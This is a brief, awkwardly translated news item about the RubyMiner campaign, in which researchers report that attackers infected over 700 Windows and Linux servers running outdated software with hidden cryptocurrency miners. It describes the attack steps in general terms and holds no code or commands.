Cyber security specialists from Check Point, Ixia and Certego found that more than 700 servers on Windows and Linux are infected with RubyMiner malicious software used for the hidden crypto currency. The first attacks were noticed last week, but the epidemic took on a mass character only a few days ago.
Since the minor works on servers under Windows and Linux, hackers use the utility p0f to determine the type of server software. If the software is old, the burglars launch special exploits that infect the server with a malicious miner who extracts crypto currency from other people's capacities and without the knowledge of their owners.
Under Linux, the exploit code erases all tasks and sets a new one: every hour a certain script is downloaded from the specified resource to the server, which installs the software for the mining. In some cases, after attacks on the server is set PyCryptoMiner. Sometimes attackers attack Oracle WebLogic servers for crypto currency.
While the scale is not large: purses that are connected to RubyMiner, contain crypto currency only 540 dollars, but hackers attacking the WebLogic server, for several months could mint several hundred thousand dollars.